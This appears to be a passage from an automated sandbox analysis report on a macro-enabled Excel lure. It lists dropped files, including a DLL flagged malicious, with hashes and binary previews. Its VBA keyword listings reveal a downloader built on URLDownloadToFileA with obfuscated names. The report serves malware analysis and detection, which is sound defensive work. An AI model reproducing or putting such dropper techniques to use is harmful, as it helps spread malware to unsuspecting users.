                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......15Q!uT?ruT?ruT?r...rtT?rx..rwT?rx..rtT?rx..rzT?rx..rwT?r...rvT?ruT>r<T?rx..rtT?rx..rzT?rx..rtT?rx..rtT?rRichuT?r........PE..L......R...........!.....d...........o....................................................@.........................`r..M...\q..<...................................`...8...........................(...@............p..\............................text....b.......d.................. ..`.data................h..............@....idata.. ....p......................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):765440
                                                                                Entropy (8bit):6.0875108403853675
                                                                                Encrypted:false
                                                                                SSDEEP:12288:F0q2AejP0XbOAQ60af2rDMmUz0x07wGwefo5SuDwadeUy:i2ejIOU0G2rDMmxxkRTs9y
                                                                                MD5:92AA183E338E9F7BBDC9CA401EB97C64
                                                                                SHA1:E45D05BF840341FBAA6FD6B9F396788C5810CB26
                                                                                SHA-256:791252FC4DEF3C4C3BDB270633FFC88C0E2CD8E8E8BA299825A83841A273E7DD
                                                                                SHA-512:EB08528C5E3DD47AE6DDC6F79BC7BBD035701F46B0845D5A90015E3FBA77634E614BB866C6EDA9F0AEC9ED06D8344B038EA56635A7214F2378D3F73B72EF2998
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......15Q!uT?ruT?ruT?r...rtT?rx..rwT?rx..rtT?rx..rzT?rx..rwT?r...rvT?ruT>r<T?rx..rtT?rx..rzT?rx..rtT?rx..rtT?rRichuT?r........PE..L......R...........!.....d...........o....................................................@.........................`r..M...\q..<...................................`...8...........................(...@............p..\............................text....b.......d.................. ..`.data................h..............@....idata.. ....p......................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 20 23:12:58 2021, atime=Wed Jan 20 23:12:58 2021, length=8192, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):867
                                                                                Entropy (8bit):4.4701762248053525
                                                                                Encrypted:false
                                                                                SSDEEP:12:85QICLgXg/XAlCPCHaXtB8XzB/o5XX+WnicvbSubDtZ3YilMMEpxRljK1TdJP9TK:85XU/XTd6j0YepDv3qgrNru/
                                                                                MD5:3933849A927739A691EE3ABD3BBBB95D
                                                                                SHA1:943DD4894158B482D53A940A162FA2DC59A351B3
                                                                                SHA-256:25FDCCF8A999E3DC5F16540CE62CDA7A82B8CAF9ACFA19392B6B5B2223583998
                                                                                SHA-512:D80229BEBE765E6045503AA08338151E599E4BF7387F584F7E6BA655F1B2DD0A2FB04FA72D5A4DA34D33D50ADCA070C257F932BB55A796F3057DC87FC446A22A
                                                                                Malicious:false
                                                                                Preview: L..................F...........7G..B.M,....B.M,..... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....5R....Desktop.d......QK.X5R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\841618\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......841618..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):178
                                                                                Entropy (8bit):4.633981770780864
                                                                                Encrypted:false
                                                                                SSDEEP:3:oyBVomxWecl/FlWiL62p/sp6lN6R/FlWiL62p/sp6lmxWecl/FlWiL62p/sp6lv:dj2b6cf0b6cZb6c1
                                                                                MD5:52C875172872C1E86ABB927887F3BE55
                                                                                SHA1:CD9498C7F86EE30388E4B62A832ADF11439F7039
                                                                                SHA-256:C1B02934C56DD0E6888523993318D5C76FC502CE2C73D429B1F8EAD4F863F8DA
                                                                                SHA-512:2C4B1734CB6F47D09E6386D9C2F2C4E8B3A5D91A6016290E6A1A5544BB50E4AE8F743E308517582B94D78DBDFA73356BAE4C82651DE90BD3FF6BEF36227FD34D
                                                                                Malicious:false
                                                                                Preview: Desktop.LNK=0..[misc]..printouts of outstanding as of 01_20_2021.LNK=0..printouts of outstanding as of 01_20_2021.LNK=0..[misc]..printouts of outstanding as of 01_20_2021.LNK=0..
                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\printouts of outstanding as of 01_20_2021.LNK
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Jan 20 23:12:58 2021, atime=Wed Jan 20 23:13:00 2021, length=54601, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2348
                                                                                Entropy (8bit):4.555912068249222
                                                                                Encrypted:false
                                                                                SSDEEP:24:8G5/XTd6jFyqqbe7AIEDv3qgdM7dD2G5/XTd6jFyqqbe7AIEDv3qgdM7dV:8e/XT0jF5OggQh2e/XT0jF5OggQ/
                                                                                MD5:D20893AB2B73DFFB6F117A54835CA1E0
                                                                                SHA1:AFCF9C0192F99411AA62831CFC9FFF1D7031571E
                                                                                SHA-256:1EA247C062A7554D42366FFF7CC0EFED238DF175E4FE1DEC1C1724787336B219
                                                                                SHA-512:6D2B787F5B2F6C2185757C6196A13568C3A4F8C5CB3073F8F84CFAA88563FB5212642D889E56E97CCD1F33DCCD95F75B915AF198D241663602CC018DA6C0FC21
                                                                                Malicious:false
                                                                                Preview: L..................F.... ....o.{..B.M,.......-....I............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.p...5R.. .PRINTO~1.XLS..........Q.y.Q.y*...8.....................p.r.i.n.t.o.u.t.s. .o.f. .o.u.t.s.t.a.n.d.i.n.g. .a.s. .o.f. .0.1._.2.0._.2.0.2.1...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\841618\Users.user\Desktop\printouts of outstanding as of 01_20_2021.xlsm.E.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.p.r.i.n.t.o.u.t.s. .o.f. .o.u.t.s.t.a.n.d.i.n.g. .a.s. .o.f. .0.1._.2.0._.2.0.2.1...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.
                                                                                C:\Users\user\Desktop\EC1F0000
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):54601
                                                                                Entropy (8bit):7.811133847012313
                                                                                Encrypted:false
                                                                                SSDEEP:1536:Xp7MJ+BqkDpBIsqBJGu+2Ug5M9PF9sqcB99O3:Xps0xDplKIu3UBTC9A
                                                                                MD5:35A9FDF89660390F074B71D0AC45BBA1
                                                                                SHA1:B50EF4640F3D9B2FA027C2736F22B632AC143DD9
                                                                                SHA-256:F27EBDF0CFE9FD8917A6D2495C6F8C7BE8C991B9F922970955E81804553886BD
                                                                                SHA-512:43C5C846473416EF77CA713E43A734D866F42CCBEADDD3D66972C95B732448158ED8BB7202C243DF55A7A6FE24ABE28838D6B8453E0F84D0138E95E581C51DFE
                                                                                Malicious:false
                                                                                Preview: ...n.0.E.......D'..(,g..4@R.[..I....(..w(9N..a...E.{f.....I....sr..H...B.*'?....I.....FCN.........OP.}N....J=.A1....WJ.....U.2.c......F..!..l.7P.'....o..l.&........V....J.].@RS..Ca..B..[...5@P2.N .=@...'t.iuu..*....+@...6.+.....fR.}.2Tv..ZX....!....I.|.Q...3V8....*'.H..wL...V.g.v[cv.t...|.-..u.)...l+.../%.!u.wRO.....z)..]0.nK.y{......&..s.....{......>.....:...}.K.g..4.mc.M..5sP<.lb....O.8..p{z...u?..p......p=.......A..1?..BL4.f....<dK._ec.8...z....../.%.S.F....l.j.G".....).q..P..i..c........PK..........!.aQ._............[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\Desktop\~$printouts of outstanding as of 01_20_2021.xlsm
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):330
                                                                                Entropy (8bit):1.4377382811115937
                                                                                Encrypted:false
                                                                                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                Malicious:true
                                                                                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                Static File Info

                                                                                General

                                                                                File type:Microsoft Excel 2007+
                                                                                Entropy (8bit):7.676195161958508
                                                                                TrID:
                                                                                • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                                                • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                                                                                • ZIP compressed archive (8000/1) 7.58%
                                                                                File name:printouts of outstanding as of 01_20_2021.xlsm
                                                                                File size:38038
                                                                                MD5:28e9c78dcffb4a80c7bcfcd818791940
                                                                                SHA1:0f239865c9e2bdd64d2017c7d26cac19dc7d3cde
                                                                                SHA256:09cceb619174c99d026734f860f26cda0107af31b9153a9f7d6613c86fd57772
                                                                                SHA512:082d84c5d6b4442f0c6d10231c0368e74906a62348aaf7bb070a602695f9420abc3aa2cce28dfeaaaae784ba7e96a8008ab9e9d5bd6f2a5dfb591e8c8f5729fc
                                                                                SSDEEP:768:IxPLv4xxXRG9HR4sjVpVNsz/LaR+ZUmlmWPwkGq/gR9uVQ4:aPb4xxXizgu+ZMFq/gR9M
                                                                                File Content Preview:PK..........!..qr.............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                File Icon

                                                                                Icon Hash:e4e2aa8aa4bcbcac

                                                                                Static OLE Info

                                                                                General

                                                                                Document Type:OpenXML
                                                                                Number of OLE Files:2

                                                                                OLE File "/opt/package/joesandbox/database/analysis/342170/sample/printouts of outstanding as of 01_20_2021.xlsm"

                                                                                Indicators

                                                                                Has Summary Info:False
                                                                                Application Name:unknown
                                                                                Encrypted Document:False
                                                                                Contains Word Document Stream:
                                                                                Contains Workbook/Book Stream:
                                                                                Contains PowerPoint Document Stream:
                                                                                Contains Visio Document Stream:
                                                                                Contains ObjectPool Stream:
                                                                                Flash Objects Count:
                                                                                Contains VBA Macros:True

                                                                                Summary

                                                                                Author:msc.com
                                                                                Last Saved By:
                                                                                Create Time:2021-01-20T10:44:11Z
                                                                                Last Saved Time:2021-01-20T11:03:27Z
                                                                                Security:0

                                                                                Document Summary

                                                                                Thumbnail Scaling Desired:false
                                                                                Company:
                                                                                Contains Dirty Links:false
                                                                                Shared Document:false
                                                                                Changed Hyperlinks:false
                                                                                Application Version:16.0300

                                                                                Streams with VBA

                                                                                VBA File Name: Module1.bas, Stream Size: 5186
                                                                                General
                                                                                Stream Path:VBA/Module1
                                                                                VBA File Name:Module1.bas
                                                                                Stream Size:5186
                                                                                Data ASCII:. . . . . $ . . . v . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . 2 . . . . . . . . . . . . . . . . . . 4 . . . . . D . . . . . . . . < . . . . . . . . . . . . . . . . . . . U R L D o w n l o a d T o F i l e A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                Data Raw:01 16 03 00 03 24 01 00 00 76 07 00 00 08 01 00 00 e4 01 00 00 ff ff ff ff a4 07 00 00 08 10 00 00 00 00 00 00 01 00 00 00 23 f3 ee 32 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 34 00 00 00 00 00 44 02 20 00 00 00 ff ff 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 00 00 ff ff ff ff 01 00 00 00 ff

                                                                                VBA Code Keywords

                                                                                Keyword
                                                                                #Else
                                                                                "urlmon"
                                                                                Resume
                                                                                fillename
                                                                                Randomize:
                                                                                Ada(u)
                                                                                Long,
                                                                                "mo")
                                                                                ol).value
                                                                                hokkkk(s,
                                                                                redline(ellysio))
                                                                                PtrSafe
                                                                                Declare
                                                                                Next:
                                                                                dwReserved
                                                                                Rnd))
                                                                                String,
                                                                                sb_t()
                                                                                pCaller
                                                                                String
                                                                                Sheets(s).UsedRange.SpecialCells(xlCellTypeConstants):
                                                                                ol).Name
                                                                                Split(govs,
                                                                                "="):
                                                                                "forsS_"
                                                                                directoo
                                                                                Split(kij(ol),
                                                                                LongPtr,
                                                                                redline
                                                                                Sheets(ol).Cells(aa,
                                                                                homedep
                                                                                ellysio
                                                                                Integer:
                                                                                ByVal
                                                                                P_Click_Box
                                                                                redline(Oa))),
                                                                                redline(yel
                                                                                Integer)
                                                                                ellysio()
                                                                                Split(StrConv(m,
                                                                                Sheets(ol).Cells(ellysio,
                                                                                "URLDownloadToFileA"
                                                                                Integer
                                                                                gogog()
                                                                                nimo(Int((UBound(nimo)
                                                                                Error
                                                                                UBound(Ada)
                                                                                Attribute
                                                                                LBound(Ada)
                                                                                szURL
                                                                                VB_Name
                                                                                fillename,
                                                                                gogog
                                                                                Function
                                                                                "mo":
                                                                                szFileName
                                                                                LongPtr
                                                                                homedep(nimo
                                                                                lpfnCB
                                                                                Alias
                                                                                Variant)
                                                                                Private
                                                                                hokkkk
                                                                                VBA Code
                                                                                VBA File Name: Sheet1.cls, Stream Size: 1479
                                                                                General
                                                                                Stream Path:VBA/Sheet1
                                                                                VBA File Name:Sheet1.cls
                                                                                Stream Size:1479
                                                                                Data ASCII:. . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . v b o x 1 _ c l i , 1 , 0 , M S F o r m s , F r a m e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . .
                                                                                Data Raw:01 16 03 00 00 13 01 00 00 a5 03 00 00 f7 00 00 00 23 02 00 00 ff ff ff ff ac 03 00 00 98 04 00 00 00 00 00 00 01 00 00 00 23 f3 00 d5 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                VBA Code Keywords

                                                                                Keyword
                                                                                VB_Name
                                                                                VB_Creatable
                                                                                VB_Exposed
                                                                                Frame"
                                                                                VB_Customizable
                                                                                VB_Control
                                                                                VB_TemplateDerived
                                                                                MSForms,
                                                                                False
                                                                                Attribute
                                                                                Private
                                                                                VB_PredeclaredId
                                                                                VB_GlobalNameSpace
                                                                                VB_Base
                                                                                VBA Code
                                                                                VBA File Name: Sheet2.cls, Stream Size: 991
                                                                                General
                                                                                Stream Path:VBA/Sheet2
                                                                                VBA File Name:Sheet2.cls
                                                                                Stream Size:991
                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . # . . ^ . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 23 f3 9d 5e 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                VBA Code Keywords

                                                                                Keyword
                                                                                False
                                                                                VB_Exposed
                                                                                Attribute
                                                                                VB_Name
                                                                                VB_Creatable
                                                                                VB_PredeclaredId
                                                                                VB_GlobalNameSpace
                                                                                VB_Base
                                                                                VB_Customizable
                                                                                VB_TemplateDerived
                                                                                VBA Code
                                                                                VBA File Name: ThisWorkbook.cls, Stream Size: 999
                                                                                General
                                                                                Stream Path:VBA/ThisWorkbook
                                                                                VBA File Name:ThisWorkbook.cls
                                                                                Stream Size:999
                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . # . . r . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 23 f3 c9 72 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                VBA Code Keywords

                                                                                Keyword
                                                                                False
                                                                                VB_Exposed
                                                                                Attribute
                                                                                VB_Name
                                                                                VB_Creatable
                                                                                "ThisWorkbook"
                                                                                VB_PredeclaredId
                                                                                VB_GlobalNameSpace
                                                                                VB_Base
                                                                                VB_Customizable
                                                                                VB_TemplateDerived
                                                                                VBA Code

                                                                                Streams

                                                                                Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 605
                                                                                General
                                                                                Stream Path:PROJECT
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Stream Size:605
                                                                                Entropy:5.19808364053
                                                                                Base64 Encoded:True
                                                                                Data ASCII:I D = " { 3 8 C 1 2 A 0 A - E 6 4 8 - 4 6 4 5 - A 7 B 8 - E 6 2 A B D C 4 2 5 E 1 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 5 0 7 E 1 E B E 1 E F E 5 E F E 5 E F E 5 E F E 5 " . .
                                                                                Data Raw:49 44 3d 22 7b 33 38 43 31 32 41 30 41 2d 45 36 34 38 2d 34 36 34 35 2d 41 37 42 38 2d 45 36 32 41 42 44 43 34 32 35 45 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                Stream Path: PROJECTwm, File Type: data, Stream Size: 107
                                                                                General
                                                                                Stream Path:PROJECTwm
                                                                                File Type:data
                                                                                Stream Size:107
                                                                                Entropy:3.24742544165
                                                                                Base64 Encoded:False
                                                                                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
                                                                                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00
                                                                                Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3838
                                                                                General
                                                                                Stream Path:VBA/_VBA_PROJECT
                                                                                File Type:data
                                                                                Stream Size:3838
                                                                                Entropy:4.51887827492
                                                                                Base64 Encoded:False
                                                                                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                                Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2390
                                                                                General
                                                                                Stream Path:VBA/__SRP_0
                                                                                File Type:data
                                                                                Stream Size:2390
                                                                                Entropy:3.38572227344
                                                                                Base64 Encoded:False
                                                                                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ P . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . s . . . . L . . . 4 . . Z r
                                                                                Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 03 00 00 00 00 00 01 00 02 00 03 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                                                                                Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 347
                                                                                General
                                                                                Stream Path:VBA/__SRP_1
                                                                                File Type:data
                                                                                Stream Size:347
                                                                                Entropy:2.5800525623
                                                                                Base64 Encoded:False
                                                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p C a l l e r . . . . . . . . . . . . . . . . s z U R L . . . . . . . . . . . . . . . . s z F i l e N a m e . . . . . . . . . . . . . . . . d w R e s e r v e d . . . . . . . . . . . . . . . . l p f n C B . . . . . . . . . . . . . . . .
                                                                                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 02 00 00 00 00 00
                                                                                Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 505
                                                                                General
                                                                                Stream Path:VBA/__SRP_2
                                                                                File Type:data
                                                                                Stream Size:505
                                                                                Entropy:2.4067697489
                                                                                Base64 Encoded:False
                                                                                Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . h . . . . .
                                                                                Data Raw:72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 696
                                                                                General
                                                                                Stream Path:VBA/__SRP_3
                                                                                File Type:data
                                                                                Stream Size:696
                                                                                Entropy:2.24538637402
                                                                                Base64 Encoded:False
                                                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P .
